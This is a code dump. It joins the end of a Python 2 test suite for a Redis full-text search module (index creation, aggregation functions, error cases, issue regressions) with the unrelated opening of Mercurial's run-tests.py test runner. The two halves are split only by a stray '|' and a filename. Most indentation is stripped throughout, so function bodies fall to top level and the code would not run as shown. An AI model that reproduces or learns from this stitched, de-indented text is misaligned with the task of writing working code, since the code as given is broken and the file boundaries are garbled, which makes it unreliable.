env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.search', 'idx', '*', 'WITHRAWIDS').equal([1L, 'doc1', 1L, ['test', 'foo']])
def testUnkownIndex(env):
    env.skipOnCluster() # todo: remove once fixed on the coordinator
env.expect('ft.aggregate').error()
env.expect('ft.aggregate', 'idx', '*').error()
env.expect('ft.aggregate', 'idx', '*', 'WITHCURSOR').error()
def testExplainError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('FT.EXPLAIN', 'idx', '(').error()
def testBadCursor(env):
env.expect('FT.CURSOR', 'READ', 'idx').error()
env.expect('FT.CURSOR', 'READ', 'idx', '1111').error()
env.expect('FT.CURSOR', 'READ', 'idx', 'bad').error()
env.expect('FT.CURSOR', 'DROP', 'idx', '1111').error()
env.expect('FT.CURSOR', 'bad', 'idx', '1111').error()
def testGroupByWithApplyError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
err = env.cmd('FT.AGGREGATE', 'idx', '*', 'APPLY', 'split()', 'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0', 'AS', 'count')[1]
assertEqualIgnoreCluster(env, str(err[0]), 'Invalid number of arguments for split')
def testSubStrErrors(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'matched_terms()', 'as', 'a', 'APPLY', 'substr(@a,0,4)')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test",3,-2)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test",3,1000)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test",-1,2)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test")', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr(1)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test", "test")', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test", "test", "test")', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test", "-1", "-1")', 'as', 'a')
env.assertTrue(env.isUp())
def testToUpperLower(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower(@test)', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'foo']])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower("FOO")', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'foo']])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper(@test)', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'FOO']])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper("foo")', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'FOO']])
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper(1)', 'as', 'a').equal([1L, ['test', 'foo', 'a', None]])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower(1)', 'as', 'a').equal([1L, ['test', 'foo', 'a', None]])
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper(1,2)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower(1,2)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
def testMatchedTerms(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'matched_terms()', 'as', 'a').equal([1L, ['test', 'foo', 'a', None]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms()', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms(100)', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms(-100)', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms("test")', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
def testStrFormatError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format("%s")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format("%", "test")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format("%b", "test")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format(5)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'upper(1)', 'as', 'b', 'APPLY', 'format("%s", @b)', 'as', 'a').equal([1L, ['test', 'foo', 'b', None, 'a', '(null)']])
# working example
env.expect('ft.aggregate', 'idx', 'foo', 'APPLY', 'format("%%s-test", "test")', 'as', 'a').equal([1L, ['a', '%s-test']])
env.expect('ft.aggregate', 'idx', 'foo', 'APPLY', 'format("%s-test", "test")', 'as', 'a').equal([1L, ['a', 'test-test']])
def testTimeFormatError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
    if not env.isCluster(): # todo: remove once fixed on the coordinator
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test1)', 'as', 'a').error()
env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test)', 'as', 'a')
env.assertTrue(env.isUp())
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test, 4)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt("awfawf")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(235325153152356426246246246254)', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test, "%s")' % ('d' * 2048), 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'hour("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'minute("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'day("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'month("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'dayofweek("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'dayofmonth("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'dayofyear("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'year("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
def testMonthOfYear(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear(@test)', 'as', 'a').equal([1L, ['test', '12234556', 'a', '4']])
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear(@test, 112)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear("bad")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
def testParseTimeErrors(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time(11)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time(11,22)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time("%s", "%s")' % ('d' * 2048, 'd' * 2048), 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time("test", "%s")' % ('d' * 2048), 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
def testMathFunctions(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'exp(@test)', 'as', 'a').equal([1L, ['test', '12234556', 'a', 'inf']])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'ceil(@test)', 'as', 'a').equal([1L, ['test', '12234556', 'a', '12234556']])
def testErrorOnOpperation(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', '1 + split()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'split() + 1', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', '"bad" + "bad"', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'split("bad" + "bad")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', '!(split("bad" + "bad"))', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'APPLY', '!@test', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
def testSortkeyUnsortable(env):
env.cmd('ft.create', 'idx', 'schema', 'test', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 'test', 'foo')
rv = env.cmd('ft.aggregate', 'idx', 'foo', 'withsortkeys',
'load', '1', '@test',
'sortby', '1', '@test')
env.assertEqual([1, '$foo', ['test', 'foo']], rv)
def testIssue919(env):
# This only works if the missing field has a lower sortable index
    # than the present field.
env.cmd('ft.create', 'idx', 'schema', 't1', 'text', 'sortable', 'n1', 'numeric', 'sortable')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 'n1', 42)
rv = env.cmd('ft.search', 'idx', '*', 'sortby', 't1', 'desc')
env.assertEqual([1L, 'doc1', ['n1', '42']], rv)
def testIssue1074(env):
# Ensure that sortable fields are returned in their string form from the
# document
env.cmd('ft.create', 'idx', 'schema', 't1', 'text', 'n1', 'numeric', 'sortable')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello', 'n1', 1581011976800)
rv = env.cmd('ft.search', 'idx', '*', 'sortby', 'n1')
env.assertEqual([1L, 'doc1', ['n1', '1581011976800', 't1', 'hello']], rv)
def testIssue1085(env):
env.skipOnCluster()
env.cmd('FT.CREATE issue1085 SCHEMA foo TEXT SORTABLE bar NUMERIC SORTABLE')
for i in range(1, 10):
env.cmd('FT.ADD issue1085 document_%d 1 REPLACE FIELDS foo foo%d bar %d' % (i, i, i))
env.expect('FT.SEARCH', 'issue1085', '@bar:[8 8]').equal([1L, 'document_8', ['foo', 'foo8', 'bar', '8']])
for i in range(1, 10):
env.cmd('FT.ADD issue1085 document_8 1 REPLACE FIELDS foo foo8 bar 8')
env.expect('ft.debug GC_FORCEINVOKE issue1085').equal('DONE')
env.expect('FT.SEARCH', 'issue1085', '@bar:[8 8]').equal([1, 'document_8', ['foo', 'foo8', 'bar', '8']])
def grouper(iterable, n, fillvalue=None):
"Collect data into fixed-length chunks or blocks"
from itertools import izip_longest
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(fillvalue=fillvalue, *args)
def to_dict(r):
return {r[i]: r[i + 1] for i in range(0, len(r), 2)}
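# Illustrative usage of the helper above (example values only, not part of the
# original tests):
#   to_dict(['inverted_sz_mb', '0', 'num_records', '0'])
#   == {'inverted_sz_mb': '0', 'num_records': '0'}
# i.e. a flat reply of alternating keys and values becomes a dict.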
def testOptimize(env):
env.skipOnCluster()
env.cmd('ft.create', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE')
env.cmd('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo')
env.assertEqual(0, env.cmd('FT.OPTIMIZE', 'idx'))
with env.assertResponseError():
env.assertOk(env.cmd('FT.OPTIMIZE', 'idx', '666'))
env.expect('FT.OPTIMIZE', 'fake_idx').error()
def testInfoError(env):
env.expect('ft.info', 'no_idx').error()
def testSetPayload(env):
env.skipOnCluster()
env.expect('flushall')
env.expect('ft.create idx schema name text').equal('OK')
env.expect('ft.add idx hotel 1.0 fields name hilton').equal('OK')
env.expect('FT.SETPAYLOAD idx hotel payload').equal('OK')
env.expect('FT.SETPAYLOAD idx hotel payload').equal('OK')
env.expect('FT.SETPAYLOAD idx fake_hotel').error() \
.contains("wrong number of arguments for 'FT.SETPAYLOAD' command")
env.expect('FT.SETPAYLOAD fake_idx hotel payload').error().contains('Unknown Index name')
env.expect('FT.SETPAYLOAD idx fake_hotel payload').error().contains('Document not in index')
def testIndexNotRemovedFromCursorListAfterRecreated(env):
env.expect('FT.CREATE idx SCHEMA f1 TEXT').ok()
env.expect('FT.AGGREGATE idx * WITHCURSOR').equal([[0], 0])
env.expect('FT.CREATE idx SCHEMA f1 TEXT').error()
env.expect('FT.AGGREGATE idx * WITHCURSOR').equal([[0], 0])
def testHindiStemmer(env):
env.cmd('FT.CREATE', 'idxTest', 'SCHEMA', 'body', 'TEXT')
env.cmd('FT.ADD', 'idxTest', 'doc1', 1.0, 'LANGUAGE', 'hindi', 'FIELDS', 'body', u'अँगरेजी अँगरेजों अँगरेज़')
res = env.cmd('FT.SEARCH', 'idxTest', u'अँगरेज़')
env.assertEqual(u'अँगरेजी अँगरेजों अँगरेज़', unicode(res[2][1], 'utf-8'))
def testMOD507(env):
env.skipOnCluster()
env.expect('ft.create idx SCHEMA t1 TEXT').ok()
for i in range(50):
env.expect('ft.add idx doc-%d 1.0 FIELDS t1 foo' % i).ok()
for i in range(50):
env.expect('del doc-%d' % i).equal(1)
res = env.cmd('FT.SEARCH', 'idx', '*', 'WITHSCORES', 'SUMMARIZE', 'FRAGS', '1', 'LEN', '25', 'HIGHLIGHT', 'TAGS', "<span style='background-color:yellow'>", "</span>")
env.assertEqual(len(res), 31)
def testUnseportedSortableTypeErrorOnTags(env):
env.skipOnCluster()
env.expect('FT.CREATE idx SCHEMA f1 TEXT SORTABLE f2 NUMERIC SORTABLE NOINDEX f3 TAG SORTABLE NOINDEX f4 TEXT SORTABLE NOINDEX').ok()
env.expect('FT.ADD idx doc1 1.0 FIELDS f1 foo1 f2 1 f3 foo1 f4 foo1').ok()
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL FIELDS f2 2 f3 foo2 f4 foo2').ok()
env.expect('HGETALL doc1').equal(['f1', 'foo1', 'f2', '2', 'f3', 'foo2', 'f4', 'foo2'])
env.expect('FT.SEARCH idx *').equal([1L, 'doc1', ['f1', 'foo1', 'f2', '2', 'f3', 'foo2', 'f4', 'foo2']])
def testIssue1158(env):
env.cmd('FT.CREATE idx SCHEMA txt1 TEXT txt2 TEXT txt3 TEXT')
env.cmd('FT.ADD idx doc1 1.0 FIELDS txt1 10 txt2 num1')
env.expect('FT.GET idx doc1').equal(['txt1', '10', 'txt2', 'num1'])
# only 1st checked (2nd returns an error)
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if @txt1||to_number(@txt2)<5 FIELDS txt1 5').equal('OK')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if @txt3&&to_number(@txt2)<5 FIELDS txt1 5').equal('NOADD')
# both are checked
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11||to_number(@txt1)>42 FIELDS txt2 num2').equal('NOADD')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11||to_number(@txt1)<42 FIELDS txt2 num2').equal('OK')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11&&to_number(@txt1)>42 FIELDS txt2 num2').equal('NOADD')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11&&to_number(@txt1)<42 FIELDS txt2 num2').equal('NOADD')
env.expect('FT.GET idx doc1').equal(['txt1', '5', 'txt2', 'num2'])
def testIssue1159(env):
env.cmd('FT.CREATE idx SCHEMA f1 TAG')
for i in range(1000):
env.cmd('FT.add idx doc%d 1.0 FIELDS f1 foo' % i)
def testIssue1169(env):
env.cmd('FT.CREATE idx SCHEMA txt1 TEXT txt2 TEXT')
env.cmd('FT.ADD idx doc1 1.0 FIELDS txt1 foo')
env.expect('FT.AGGREGATE idx foo GROUPBY 1 @txt1 REDUCE FIRST_VALUE 1 @txt2 as test').equal([1L, ['txt1', 'foo', 'test', None]])
def testIssue1184(env):
field_types = ['TEXT', 'NUMERIC', 'TAG']
for ft in field_types:
env.assertOk(env.execute_command('FT.CREATE idx SCHEMA field ' + ft))
res = env.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['inverted_sz_mb'], '0')
env.assertEqual(d['num_records'], '0')
value = '42'
env.assertOk(env.execute_command('FT.ADD idx doc0 1 FIELD field ' + value))
doc = env.cmd('FT.SEARCH idx *')
env.assertEqual(doc, [1L, 'doc0', ['field', value]])
res = env.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertGreater(d['inverted_sz_mb'], '0')
env.assertEqual(d['num_records'], '1')
env.assertEqual(env.execute_command('FT.DEL idx doc0'), 1)
env.cmd('ft.debug', 'GC_FORCEINVOKE', 'idx')
res = env.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['inverted_sz_mb'], '0')
env.assertEqual(d['num_records'], '0')
env.cmd('FT.DROP idx')
def testIssue1208(env):
env.cmd('FT.CREATE idx SCHEMA n NUMERIC')
env.cmd('FT.ADD idx doc1 1 FIELDS n 1.0321e5')
env.cmd('FT.ADD idx doc2 1 FIELDS n 101.11')
env.cmd('FT.ADD idx doc3 1 FIELDS n 0.0011')
env.expect('FT.SEARCH', 'idx', '@n:[1.1432E3 inf]').equal([1L, 'doc1', ['n', '1.0321e5']])
env.expect('FT.SEARCH', 'idx', '@n:[-1.12E-3 1.12E-1]').equal([1L, 'doc3', ['n', '0.0011']])
res = [3L, 'doc3', ['n', '0.0011'], 'doc2', ['n', '101.11'], 'doc1', ['n', '1.0321e5']]
env.expect('FT.SEARCH', 'idx', '@n:[-inf inf]').equal(res)
env.expect('FT.ADD idx doc3 1 REPLACE PARTIAL IF @n>42e3 FIELDS n 100').equal('NOADD')
env.expect('FT.ADD idx doc3 1 REPLACE PARTIAL IF @n<42e3 FIELDS n 100').ok()
print env.cmd('FT.SEARCH', 'idx', '@n:[-inf inf]')
|
run-tests.py
|
#!/usr/bin/env python3
#
# run-tests.py - Run a set of tests on Mercurial
#
# Copyright 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
# Modifying this script is tricky because it has many modes:
# - serial (default) vs parallel (-jN, N > 1)
# - no coverage (default) vs coverage (-c, -C, -s)
# - temp install (default) vs specific hg script (--with-hg, --local)
# - tests are a mix of shell scripts and Python scripts
#
# If you change this script, it is recommended that you ensure you
# haven't broken it by running it in various modes with a representative
# sample of test scripts. For example:
#
# 1) serial, no coverage, temp install:
# ./run-tests.py test-s*
# 2) serial, no coverage, local hg:
# ./run-tests.py --local test-s*
# 3) serial, coverage, temp install:
# ./run-tests.py -c test-s*
# 4) serial, coverage, local hg:
# ./run-tests.py -c --local test-s* # unsupported
# 5) parallel, no coverage, temp install:
# ./run-tests.py -j2 test-s*
# 6) parallel, no coverage, local hg:
# ./run-tests.py -j2 --local test-s*
# 7) parallel, coverage, temp install:
# ./run-tests.py -j2 -c test-s* # currently broken
# 8) parallel, coverage, local install:
# ./run-tests.py -j2 -c --local test-s* # unsupported (and broken)
# 9) parallel, custom tmp dir:
# ./run-tests.py -j2 --tmpdir /tmp/myhgtests
# 10) parallel, pure, tests that call run-tests:
# ./run-tests.py --pure `grep -l run-tests.py *.t`
#
# (You could use any subset of the tests: test-s* happens to match
# enough that it's worth doing parallel runs, few enough that it
# completes fairly quickly, includes both shell and Python scripts, and
# includes some scripts that run daemon processes.)
from __future__ import absolute_import, print_function
import argparse
import collections
import contextlib
import difflib
import distutils.version as version
import errno
import json
import multiprocessing
import os
import platform
import random
import re
import shutil
import signal
import socket
import subprocess
import sys
import sysconfig
import tempfile
import threading
import time
import unittest
import uuid
import xml.dom.minidom as minidom
try:
import Queue as queue
except ImportError:
import queue
try:
import shlex
shellquote = shlex.quote
except (ImportError, AttributeError):
import pipes
shellquote = pipes.quote
processlock = threading.Lock()
pygmentspresent = False
# ANSI color is unsupported prior to Windows 10
if os.name != "nt":
try: # is pygments installed
import pygments
import pygments.lexers as lexers
import pygments.lexer as lexer
import pygments.formatters as formatters
import pygments.token as token
import pygments.style as style
pygmentspresent = True
difflexer = lexers.DiffLexer()
terminal256formatter = formatters.Terminal256Formatter()
except ImportError:
pass
if pygmentspresent:
class TestRunnerStyle(style.Style):
default_style = ""
skipped = token.string_to_tokentype("Token.Generic.Skipped")
failed = token.string_to_tokentype("Token.Generic.Failed")
skippedname = token.string_to_tokentype("Token.Generic.SName")
failedname = token.string_to_tokentype("Token.Generic.FName")
styles = {
skipped: "#e5e5e5",
skippedname: "#00ffff",
failed: "#7f0000",
failedname: "#ff0000",
}
class TestRunnerLexer(lexer.RegexLexer):
testpattern = r"[\w-]+\.(t|py)(#[a-zA-Z0-9_\-\.]+)?"
tokens = {
"root": [
(r"^Skipped", token.Generic.Skipped, "skipped"),
(r"^Failed ", token.Generic.Failed, "failed"),
(r"^ERROR: ", token.Generic.Failed, "failed"),
],
"skipped": [
(testpattern, token.Generic.SName),
(r":.*", token.Generic.Skipped),
],
"failed": [
(testpattern, token.Generic.FName),
(r"(:| ).*", token.Generic.Failed),
],
}
runnerformatter = formatters.Terminal256Formatter(style=TestRunnerStyle)
runnerlexer = TestRunnerLexer()
origenviron = os.environ.copy()
if sys.version_info > (3, 5, 0):
PYTHON3 = True
xrange = range # we use xrange in one place, and we'd rather not use range
def _sys2bytes(p):
if p is None:
return p
return p.encode("utf-8")
def _bytes2sys(p):
if p is None:
return p
return p.decode("utf-8")
osenvironb = getattr(os, "environb", None)
if osenvironb is None:
# Windows lacks os.environb, for instance. A proxy over the real thing
# instead of a copy allows the environment to be updated via bytes on
# all platforms.
class environbytes(object):
def __init__(self, strenv):
self.__len__ = strenv.__len__
self.clear = strenv.clear
self._strenv = strenv
def __getitem__(self, k):
v = self._strenv.__getitem__(_bytes2sys(k))
return _sys2bytes(v)
def __setitem__(self, k, v):
self._strenv.__setitem__(_bytes2sys(k), _bytes2sys(v))
def __delitem__(self, k):
self._strenv.__delitem__(_bytes2sys(k))
def __contains__(self, k):
return self._strenv.__contains__(_bytes2sys(k))
def __iter__(self):
return iter([_sys2bytes(k) for k in iter(self._strenv)])
def get(self, k, default=None):
v = self._strenv.get(_bytes2sys(k), _bytes2sys(default))
return _sys2bytes(v)
def pop(self, k, default=None):
v = self._strenv.pop(_bytes2sys(k), _bytes2sys(default))
return _sys2bytes(v)
osenvironb = environbytes(os.environ)
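        # Illustrative behaviour of the proxy above (example values only):
        #   osenvironb[b"PATH"] returns os.environ["PATH"] encoded as UTF-8,
        #   osenvironb[b"FOO"] = b"bar" stores os.environ["FOO"] = "bar",
        # so callers can keep using bytes keys and values on every platform.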
